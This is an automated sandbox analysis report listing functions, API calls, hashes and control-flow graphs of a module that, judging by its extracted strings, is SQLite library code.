                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesDelete
                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                      • API String ID: 2910425767-1405699761
                                                                                                                                                                                      • Opcode ID: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
                                                                                                                                                                                      • Instruction ID: 29714afa89f386806eea159ce7073c0dea61d8a0dfc4e5eb5f04bd45cdc608d1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 04418221E0860382FA549F26F8802786391FF88B90F574636DADD437B5DFBDE8958302
                                                                                                                                                                                      Function 00007FFEEE1036F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1393 7ffeee1036f0-7ffeee10371b 1394 7ffeee10371d-7ffeee103732 1393->1394 1395 7ffeee10376b-7ffeee103798 1393->1395 1396 7ffeee103754-7ffeee103768 call 7ffeee24cf10 1394->1396 1397 7ffeee103734 call 7ffeee24cf10 1394->1397 1398 7ffeee1037a0-7ffeee1037cb ReadFile 1395->1398 1396->1395 1403 7ffeee103739 1397->1403 1401 7ffeee103858-7ffeee10385a 1398->1401 1402 7ffeee1037d1-7ffeee1037e1 1398->1402 1405 7ffeee10385c-7ffeee103883 call 7ffeee128730 1401->1405 1406 7ffeee103888-7ffeee103891 1401->1406 1402->1401 1411 7ffeee1037e3-7ffeee1037f6 1402->1411 1410 7ffeee10373b-7ffeee103753 1403->1410 1405->1406 1406->1403 1409 7ffeee103897-7ffeee1038ac call 7ffeee24d5c0 1406->1409 1409->1410 1415 7ffeee1037f8-7ffeee1037fe 1411->1415 1416 7ffeee103830-7ffeee103853 call 7ffeee241a30 1411->1416 1417 7ffeee103806-7ffeee103809 1415->1417 1418 7ffeee103800-7ffeee103804 1415->1418 1416->1410 1420 7ffeee103812-7ffeee10382b 1417->1420 1421 7ffeee10380b-7ffeee103810 1417->1421 1418->1417 1418->1420 1420->1398 1421->1416 1421->1420
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                      • API String ID: 2738559852-1843600136
                                                                                                                                                                                      • Opcode ID: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                      • Instruction ID: 0a09bd30c265149c966a8b60d76649d2cb3f7bf119140638cce1c3c7ff2d7357
                                                                                                                                                                                      • Opcode Fuzzy Hash: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4841E232A08A4282E614CF15F4446B9B765FB88B80F574637DACD437B8DFBCE4828742
                                                                                                                                                                                      Function 00007FFEEE239C70 Relevance: 3.3, APIs: 2, Instructions: 327COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1989 7ffeee239c70-7ffeee239cb2 1990 7ffeee239ce0-7ffeee239ce2 1989->1990 1991 7ffeee239cb4-7ffeee239cba 1989->1991 1994 7ffeee239d61-7ffeee239d8b call 7ffeee1b2470 * 2 1990->1994 1995 7ffeee239ce4-7ffeee239ce8 1990->1995 1992 7ffeee239cc5-7ffeee239cc8 1991->1992 1993 7ffeee239cbc-7ffeee239cc0 1991->1993 1998 7ffeee239cd3-7ffeee239cd6 1992->1998 1999 7ffeee239cca-7ffeee239cd0 1992->1999 1997 7ffeee23a0d9-7ffeee23a0f5 call 7ffeee24bac0 1993->1997 2016 7ffeee239d91-7ffeee239d99 1994->2016 2017 7ffeee239e2c-7ffeee239e4a 1994->2017 2000 7ffeee239d4b-7ffeee239d4f 1995->2000 2001 7ffeee239cea-7ffeee239cf0 call 7ffeee2385f0 1995->2001 1998->1990 1999->1998 2000->1994 2005 7ffeee239d51-7ffeee239d5c call 7ffeee236ac0 2000->2005 2006 7ffeee239cf5-7ffeee239cfa 2001->2006 2005->1997 2011 7ffeee239d3e-7ffeee239d42 2006->2011 2012 7ffeee239cfc-7ffeee239d03 2006->2012 2011->2000 2018 7ffeee239d44-7ffeee239d46 2011->2018 2014 7ffeee239d21-7ffeee239d28 2012->2014 2015 7ffeee239d05-7ffeee239d14 call 7ffeee239420 2012->2015 2014->1997 2027 7ffeee239d16-7ffeee239d1c call 7ffeee23a160 2015->2027 2028 7ffeee239d2d-7ffeee239d30 2015->2028 2016->2017 2020 7ffeee239d9f-7ffeee239da6 2016->2020 2021 7ffeee239e56-7ffeee239e5f 2017->2021 2022 7ffeee239e4c-7ffeee239e52 2017->2022 2018->1997 2024 7ffeee239db1-7ffeee239db5 2020->2024 2025 7ffeee239da8-7ffeee239daf 2020->2025 2026 7ffeee239e60-7ffeee239e6d 2021->2026 2022->2021 2024->2017 2029 7ffeee239db7-7ffeee239dca call 7ffeee239420 2024->2029 2025->2024 2025->2029 2030 7ffeee239e6f-7ffeee239e7a 2026->2030 2031 7ffeee239e7c 2026->2031 2027->2014 2028->2018 2034 7ffeee239d32-7ffeee239d39 2028->2034 2042 7ffeee239ddd-7ffeee239ddf 2029->2042 2043 7ffeee239dcc-7ffeee239dd3 2029->2043 2032 7ffeee239e7e-7ffeee239e80 2030->2032 2031->2032 2037 7ffeee239e82-7ffeee239ea1 RaiseException 2032->2037 2038 7ffeee239ea7-7ffeee239eaa 2032->2038 2034->1997 2037->2038 2040 7ffeee239ebc 2038->2040 2041 7ffeee239eac-7ffeee239eaf 2038->2041 2047 7ffeee239ec0-7ffeee239ec9 2040->2047 2041->2040 2046 7ffeee239eb1-7ffeee239eba 2041->2046 2044 7ffeee239de1-7ffeee239dff call 7ffeee1b2470 call 7ffeee24ce10 2042->2044 2045 7ffeee239e20-7ffeee239e23 2042->2045 2043->2042 2066 7ffeee239e01-7ffeee239e0f call 7ffeee23a160 2044->2066 2067 7ffeee239e14-7ffeee239e1b 2044->2067 2045->2017 2049 7ffeee239e25-7ffeee239e27 2045->2049 2046->2047 2047->2026 2050 7ffeee239ecb-7ffeee239ed4 2047->2050 2052 7ffeee23a0d1 2049->2052 2053 7ffeee239f2e 2050->2053 2054 7ffeee239ed6-7ffeee239ed9 2050->2054 2052->1997 2056 7ffeee239f33-7ffeee239f35 2053->2056 2057 7ffeee239ee3-7ffeee239eeb 2054->2057 2058 7ffeee239edb-7ffeee239edd 2054->2058 2060 7ffeee239fb0-7ffeee239fb4 2056->2060 2061 7ffeee239f37-7ffeee239f47 2056->2061 2063 7ffeee239ef0-7ffeee239ef4 2057->2063 2058->2057 2062 7ffeee239fab 2058->2062 2064 7ffeee239fe9-7ffeee239ffa 2060->2064 2065 7ffeee239fb6-7ffeee239fd5 2060->2065 2068 7ffeee23a0c9 2061->2068 2062->2060 2069 7ffeee239ef6-7ffeee239f16 2063->2069 2070 7ffeee239f5c 2063->2070 2071 7ffeee239ffc-7ffeee23a009 2064->2071 2072 7ffeee23a03a-7ffeee23a03e 2064->2072 2084 7ffeee23a085-7ffeee23a08f 2065->2084 2085 7ffeee239fdb-7ffeee239fe3 2065->2085 2066->2052 2067->2052 2068->2052 2082 7ffeee239f18-7ffeee239f1b 2069->2082 2083 7ffeee239f4c-7ffeee239f5a 2069->2083 2074 7ffeee239f5e-7ffeee239f76 2070->2074 2071->2072 2092 7ffeee23a00b-7ffeee23a034 RaiseException 2071->2092 2078 7ffeee23a051-7ffeee23a05b 2072->2078 2079 7ffeee23a040-7ffeee23a047 2072->2079 2080 7ffeee239fa5-7ffeee239fa9 2074->2080 2081 7ffeee239f78-7ffeee239f9f 2074->2081 2087 7ffeee23a091-7ffeee23a095 2078->2087 2088 7ffeee23a05d-7ffeee23a07d call 7ffeee1b2470 call 7ffeee24ce10 2078->2088 2079->2078 2080->2056 2081->2080 2082->2068 2089 7ffeee239f21-7ffeee239f28 2082->2089 2083->2074 2084->2068 2085->2064 2090 7ffeee23a0c4 2087->2090 2091 7ffeee23a097-7ffeee23a0bd 2087->2091 2088->2087 2100 7ffeee23a07f-7ffeee23a083 2088->2100 2089->2063 2096 7ffeee239f2a 2089->2096 2090->2068 2091->2090 2092->2072 2096->2053 2100->2068
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                      • Instruction ID: 4e582f8dfab14a6402fc589c0c438c9982014f6bdf194f87871b3d5ae0109d4d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 64D19162A1864786EB549F25E44033933A1FB89B84F175136DACE877B8DFBDE844CB01
                                                                                                                                                                                      Function 00007FFEEE25996C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 2101 7ffeee25996c-7ffeee25996f 2102 7ffeee259971-7ffeee25998a RtlFreeHeap 2101->2102 2103 7ffeee2599a7 2101->2103 2104 7ffeee2599a2-7ffeee2599a6 2102->2104 2105 7ffeee25998c-7ffeee2599a0 GetLastError call 7ffeee259df4 call 7ffeee259ec8 2102->2105 2104->2103 2105->2104
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FFEEE2622A2,?,?,?,00007FFEEE2622DF,?,?,00000000,00007FFEEE25FE4D,?,?,?,00007FFEEE25FD7F), ref: 00007FFEEE259982
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFEEE2622A2,?,?,?,00007FFEEE2622DF,?,?,00000000,00007FFEEE25FE4D,?,?,?,00007FFEEE25FD7F), ref: 00007FFEEE25998C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                      • Opcode ID: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                      • Instruction ID: e1d5d5061107eb7bfe14cfed9548c26bffa59dc556f10375d9f0a086d3eb8b5b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE08650F09A0383FF156FB2B9853781161AFDC700F0B4434C9ED42271EDAC64994213

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Function 00007FFEEE1C4770 Relevance: 30.0, Strings: 23, Instructions: 1217COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$FIRST$INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);$LAST$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$invalid rootpage$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$unsupported use of NULLS %s$views may not be indexed$virtual tables may not be indexed
                                                                                                                                                                                      • API String ID: 0-2483461966
                                                                                                                                                                                      • Opcode ID: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                      • Instruction ID: 13113b58b3adaee61ea4e236168e7eb231ed3930462edba1ef379f5f04ad3c90
                                                                                                                                                                                      • Opcode Fuzzy Hash: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                      • Instruction Fuzzy Hash: 63C2D432A09BA285EB188B15F4457B977A1FB84B94F474136DACD877A5DFBCE480C302
                                                                                                                                                                                      Function 00007FFEEE199AB0 Relevance: 25.1, Strings: 19, Instructions: 1311COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s: "%s" - should this be a string literal in single-quotes?$%s: %s$%s: %s.%s$%s: %s.%s.%s$H$N$ROWID$ambiguous column name$coalesce$double-quoted string literal: "%w"$excluded$main$misuse of aliased aggregate %s$misuse of aliased window function %s$new$no such column$old$row value misused$z
                                                                                                                                                                                      • API String ID: 0-3187542301
                                                                                                                                                                                      • Opcode ID: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                      • Instruction ID: 5c9417d81218b5493e69c61409c7de2e0660cd787ad18a63bdd952df95bfa4d8
                                                                                                                                                                                      • Opcode Fuzzy Hash: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                      • Instruction Fuzzy Hash: 74C2C272A0C69286EB648B16A04037D7BA1FB85B80F574136DECE477A5DFBEE484C701
                                                                                                                                                                                      Function 00007FFEEE10FBB0 Relevance: 24.1, Strings: 19, Instructions: 334COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                      • API String ID: 0-767664412
                                                                                                                                                                                      • Opcode ID: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                      • Instruction ID: 2d1f03e04a785ea342f58688a0c896eaae6e5f38eefd104c1d3ac33b4ba79aae
                                                                                                                                                                                      • Opcode Fuzzy Hash: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 35B149D37305984BD7588A3EF822BDD2B85D3A5344F49523AF685CFFC6E92AE5018702
                                                                                                                                                                                      Function 00007FFEEE1569D0 Relevance: 23.8, Strings: 18, Instructions: 1323COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: , ?$,%s(?)$4$PRAGMA %Q.page_size$compress$content$error parsing prefix parameter: %s$languageid$matchinfo$missing %s parameter in fts4 constructor$no such column: %s$notindexed$order$prefix$simple$tokenize$uncompress$unrecognized parameter: %s
                                                                                                                                                                                      • API String ID: 0-404594414
                                                                                                                                                                                      • Opcode ID: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                      • Instruction ID: 48ec63effb79c5e65ed76799559a0de0755f93a714de4cddfaefd558c4c8da6d
                                                                                                                                                                                      • Opcode Fuzzy Hash: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BD26A21A09B4685EB558F26F84037967A0FF89B94F170536DA9E037B4CFBDE4898702
                                                                                                                                                                                      Function 00007FFEEE110010 Relevance: 17.7, Strings: 14, Instructions: 201COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: .$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                      • API String ID: 0-3693326857
                                                                                                                                                                                      • Opcode ID: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                      • Instruction ID: f7e648e2ea1274729b927e1cb4a55c14fda62b69c3426d7801a495f8e6558193
                                                                                                                                                                                      • Opcode Fuzzy Hash: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                      • Instruction Fuzzy Hash: CF614D93B205984BE74DC73EBC22BAD2B955394344F084235DA85DFBC6E929D5018742
                                                                                                                                                                                      Function 00007FFEEE1F57F0 Relevance: 16.8, Strings: 13, Instructions: 503COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s mode not allowed: %s$/$/$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                      • API String ID: 0-3326250075
                                                                                                                                                                                      • Opcode ID: 72810fc45149092ed43ee729b48025bb36086465848980857dd08bbe2587332e
                                                                                                                                                                                      • Instruction ID: 0ce58e49cadfd77cb7a1c0364d20694f35980f10df8bdfbf20b968137737bcb5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 72810fc45149092ed43ee729b48025bb36086465848980857dd08bbe2587332e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8522D071A0CA8245FB698F11B4403796B91BF45BA4F074237CADE066F5DEACE8C5C382
                                                                                                                                                                                      Function 00007FFEEE1746C0 Relevance: 16.0, Strings: 12, Instructions: 1030COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
